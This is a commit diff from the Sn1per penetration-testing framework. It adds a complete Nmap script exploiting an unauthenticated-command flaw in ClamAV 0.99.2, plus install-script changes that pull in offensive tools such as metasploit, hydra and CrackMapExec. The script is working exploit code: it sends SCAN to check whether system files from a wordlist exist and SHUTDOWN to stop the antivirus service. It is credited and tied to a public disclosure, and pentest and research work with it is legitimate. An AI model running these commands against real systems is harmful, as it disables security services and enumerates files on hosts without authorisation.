Sn1per by 1N3 @CrowdShield

CloudSecDB · Jun 15, 2016 · a5f617f · a5f617f
1 parent 81324fe
commit a5f617f
Show file tree

Hide file tree

Showing 4 changed files with 274 additions and 15 deletions.
diff --git a/README.md b/README.md
@@ -50,6 +50,8 @@ https://gist.github.com/1N3/8214ec2da2c91691bcbc
 ```
 
 ## CHANGELOG:
+* v1.7f - Added Zenmap XML auto-imports 
+* v1.7f - Added ClamAV RCE Nmap script
 * v1.7e - Fixed minor issue with airstrike and nuke mode
 * v1.7e - Fixed minor issues with discover mode
 * v1.7e - Added minor cosmetic improvements to reports

diff --git a/bin/clamav-exec.nse b/bin/clamav-exec.nse
@@ -0,0 +1,243 @@
+local shortport = require "shortport"
+local vulns = require "vulns" 
+local nmap = require "nmap"
+local stdnse = require "stdnse"
+local table = require "table"
+local io = require "io"
+local string = require "string"
+
+description = [[
+Exploits ClamAV servers vulnerable to unauthenticated clamav comand execution. 
+
+ClamAV server 0.99.2, and possibly other previous versions, allow the execution 
+of dangerous service commands without authentication. Specifically, the command 'SCAN' 
+may be used to list system files and the command 'SHUTDOWN' shut downs the 
+service. This vulnerability was discovered by Alejandro Hernandez (nitr0us).
+
+This script without arguments test the availability of the command 'SCAN'. 
+
+Reference:
+* https://twitter.com/nitr0usmx/status/740673507684679680
+* https://bugzilla.clamav.net/show_bug.cgi?id=11585
+]]
+
+---
+-- @usage 
+-- nmap -sV --script clamav-exec <target>
+-- nmap --script clamav-exec --script-args cmd='scan',scandb='files.txt' <target>
+-- nmap --script clamav-exec --script-args cmd='shutdown' <target>
+-- 
+-- @output
+-- PORT     STATE SERVICE VERSION
+-- 3310/tcp open  clam    ClamAV 0.99.2 (21714)
+-- | clamav-exec: 
+-- |   VULNERABLE:
+-- |   ClamAV Remote Command Execution
+-- |     State: VULNERABLE
+-- |       ClamAV 0.99.2, and possibly other previous versions, allow the execution of the 
+-- |       clamav commands SCAN and SHUTDOWN without authentication. The command 'SCAN' 
+-- |       may be used to enumerate system files and the command 'SHUTDOWN' shut downs the 
+-- |       service. This vulnerability was discovered by Alejandro Hernandez (nitr0us).
+-- |       
+-- |     Disclosure date: 2016-06-8
+-- |     Extra information:
+-- |       SCAN command is enabled.
+-- |     References:
+-- |       https://bugzilla.clamav.net/show_bug.cgi?id=11585
+-- |_      https://twitter.com/nitr0usmx/status/740673507684679680
+-- @xmloutput 
+-- <table key="NMAP-1">
+-- <elem key="title">ClamAV Remote Command Execution</elem>
+-- <elem key="state">VULNERABLE</elem>
+-- <table key="description">
+-- <elem>ClamAV 0.99.2, and possibly other previous versions, allow the execution 
+-- of the &#xa;clamav commands SCAN and SHUTDOWN without authentication. 
+-- The command &apos;SCAN&apos; &#xa;may be used to enumerate system files and 
+-- the command &apos;SHUTDOWN&apos; shut downs the &#xa;service. 
+-- This vulnerability was discovered by Alejandro Hernandez (nitr0us).&#xa;</elem>
+-- </table>
+-- <table key="dates">
+-- <table key="disclosure">
+-- <elem key="year">2016</elem>
+-- <elem key="day">8</elem>
+-- <elem key="month">06</elem>
+-- </table>
+-- </table>
+-- <elem key="disclosure">2016-06-8</elem>
+-- <table key="extra_info">
+-- <elem>SCAN command is enabled.</elem>
+-- </table>
+-- <table key="refs">
+-- <elem>https://bugzilla.clamav.net/show_bug.cgi?id=11585</elem>
+-- <elem>https://twitter.com/nitr0usmx/status/740673507684679680</elem>
+-- </table>
+-- </table>
+--
+-- @args clamav-exec.cmd Command to execute. Option: scan and shutdown
+-- @args clamav-exec.scandb Database to file list. 
+---
+
+author = "Paulino Calderon <calderon()websec.mx>"
+license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
+categories = {"exploit", "vuln"}
+
+portrule = shortport.port_or_service{3310, "clam"}
+
+local function shutdown(host, port)
+  local s = nmap.new_socket()
+  local status, err = s:connect(host, port)
+  if not status then
+    stdnse.debug1("Failed to connect")
+    return nil
+  end
+  status, err = s:send("SHUTDOWN")
+  if not status then
+    stdnse.debug1("Failed to send SHUTDOWN command")
+    return nil
+  end
+  return true
+end
+
+---
+-- scan(host, port, file)
+-- Sends SCAN %FILE command to clamav.
+-- If no file is specified, we query a non existing file to check the response.
+--
+local function scan(host, port, file)
+  local data
+  local s = nmap.new_socket()
+  local status, err = s:connect(host, port)
+  if not status then
+    stdnse.debug1("Failed to connect")
+    return nil
+  end
+
+  if not file then
+    status, err = s:send("SCAN /trinity/loves/nmap")
+    if not status then
+      stdnse.debug1("Failed to send SCAN command")
+      return nil
+    end
+
+    status, data = s:receive()
+    if status and data:match("No such file") then
+      stdnse.debug1("SCAN command enabled")
+      return true, nil
+    end
+  else 
+    status, err = s:send(string.format("SCAN %s", file))
+    if not status then
+      stdnse.debug1("Failed to send 'SCAN %s' command", file)
+      return nil
+    end
+    status, data = s:receive()
+    if status then
+      if data:match("OK") then
+        stdnse.debug1("File '%s' exists", file)
+        return true, true
+      else
+        stdnse.debug1("File '%s' does not exists", file)
+        return true, nil
+      end
+    end
+  end
+
+  return nil
+end
+
+local function check_clam(host, port)
+  local s = nmap.new_socket()
+  local status, err = s:connect(host, port)
+  if not status then
+    stdnse.debug1("Failed to connect")
+    return nil
+  end
+  status, err = s:send("PING")
+  if not status then
+    stdnse.debug1("Failed to send PING command")
+    return nil
+  end
+  local data
+  status, data = s:receive()
+  if status and data:match("PONG") then
+    stdnse.debug1("PONG response received")
+    return true
+  end
+  return nil
+end
+
+action = function(host, port)
+  local cmd = stdnse.get_script_args(SCRIPT_NAME..".cmd") or nil
+  local scandb = stdnse.get_script_args(SCRIPT_NAME..".scandb") or nil
+
+  if cmd == "scan" and not scandb then
+    return "The argument 'scandb' must be set if we are using the command 'SCAN'"
+  end
+
+  --Check the service and update the port table
+  local clamchk = check_clam(host, port)
+  if clamchk then
+    stdnse.debug1("ClamAV daemon found")
+    port.version.name = "clam"
+    port.version.product = "ClamAV"
+    nmap.set_port_version(host, port)
+  end
+
+  local vuln = {
+    title = 'ClamAV Remote Command Execution',
+    state = vulns.STATE.NOT_VULN,
+    description = [[
+ClamAV 0.99.2, and possibly other previous versions, allow the execution of the 
+clamav commands SCAN and SHUTDOWN without authentication. The command 'SCAN' 
+may be used to enumerate system files and the command 'SHUTDOWN' shut downs the 
+service. This vulnerability was discovered by Alejandro Hernandez (nitr0us).
+]],
+    references = {
+      'https://bugzilla.clamav.net/show_bug.cgi?id=11585',
+      'https://twitter.com/nitr0usmx/status/740673507684679680'
+    },
+    dates = {
+      disclosure = {year = '2016', month = '06', day = '8'},
+    },
+  }
+  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+  local status, files = nil
+
+  if cmd == "scan" then
+    local file = io.open(scandb, "r")
+    if not file then
+      stdnse.debug1("Couldn't open file '%s'", scandb)
+      return nil
+    end
+    local files = {}
+    local exists
+    while true do
+      local db_line = file:read()
+      if not db_line then
+        break
+      end
+      status, exists = scan(host, port, db_line)
+      if status and exists then
+        table.insert(files, string.format("%s - FOUND!", db_line))
+      end
+    end
+    if #files > 0 then
+      vuln.extra_info = stdnse.format_output(true, files)
+      vuln.state = vulns.STATE.VULN
+    end
+  elseif cmd == "shutdown" then
+    status = shutdown(host, port)
+    if status then
+      vuln.extra_info = "SHUTDOWN command sent succesfully."  
+      vuln.state = vulns.STATE.VULN
+    end
+  else 
+    status, files = scan(host, port, nil)
+    if status then
+      vuln.extra_info = "SCAN command is enabled."
+      vuln.state = vulns.STATE.VULN
+    end
+  end
+
+  return vuln_report:make_output(vuln)
+end
diff --git a/install.sh b/install.sh
@@ -24,7 +24,7 @@ echo -e "$OKGREEN + -- --=[This script will install or upgrade your Sn1per insta
 read answer
 
 echo -e "$OKORANGE + -- --=[Installing package dependencies...$RESET"
-apt-get install sslyze joomscan uniscan xprobe2 cutycapt unicornscan waffit host whois arachni theharvester dnsenum dirb dnsrecon curl nmap php5 php5-curl wapiti hydra iceweasel wpscan sqlmap arachni w3af golismero nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb python nbtscan sslscan amap
+apt-get install zenmap sslyze joomscan uniscan xprobe2 cutycapt unicornscan waffit host whois arachni theharvester dnsenum dirb dnsrecon curl nmap php5 php5-curl wapiti hydra iceweasel wpscan sqlmap arachni w3af golismero nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb python nbtscan sslscan amap
 
 echo -e "$OKORANGE + -- --=[Installing gem dependencies...$RESET"
 gem install rake
@@ -47,9 +47,11 @@ git clone https://github.com/aboul3la/Sublist3r.git
 git clone https://github.com/nccgroup/shocker.git
 git clone https://github.com/joaomatosf/jexboss.git
 git clone https://github.com/byt3bl33d3r/CrackMapExec.git
+git clone https://github.com/drwetter/testssl.sh.git
 
 echo -e "$OKORANGE + -- --=[Setting up environment...$RESET"
 mkdir loot 2> /dev/null
+cp -f $DIR/bin/clamav-exec.nse /usr/share/nmap/scripts/ 2> /dev/null
 chmod +x $DIR/sniper
 chmod +x $DIR/bin/dnsdict6
 chmod +x $DIR/Goohak/goohak
@@ -58,6 +60,7 @@ chmod +x $DIR/MassBleed/massbleed
 chmod +x $DIR/MassBleed/heartbleed.py
 chmod +x $DIR/MassBleed/openssl_ccs.pl
 chmod +x $DIR/SuperMicro-Password-Scanner/supermicro_scan.sh
+chmod +x $DIR/testssl.sh/testssl.sh
 rm -f /usr/bin/sniper
 rm -f /usr/bin/goohak
 rm -f /usr/bin/xsstracer
@@ -74,9 +77,7 @@ ln -s $DIR/Findsploit/copysploit /usr/bin/copysploit
 ln -s $DIR/Findsploit/compilesploit /usr/bin/compilesploit
 ln -s $DIR/MassBleed/massbleed /usr/bin/massbleed
 ln -s $DIR/BruteX/brutex /usr/bin/brutex
-
-# REMOVED BUT STILL AVAILABLE IF NEEDED
-# echo -e "$OKGREEN + -- --=[Be sure to install the following packages manually and update the sniper script references: dig dnsdict6 cmsmap samrdump inurlbr wafw00f showmount samrdump rpcinfo snmpwalk$RESET"
+ln -s $DIR/testssl.sh/testssl.sh /usr/bin/testssl
 
 echo -e "$OKORANGE + -- --=[For universal sniper access, be sure to edit sniper to include the full path for the SNIPER_DIR variable. $RESET"
 echo -e "$OKORANGE + -- --=[Done!$RESET"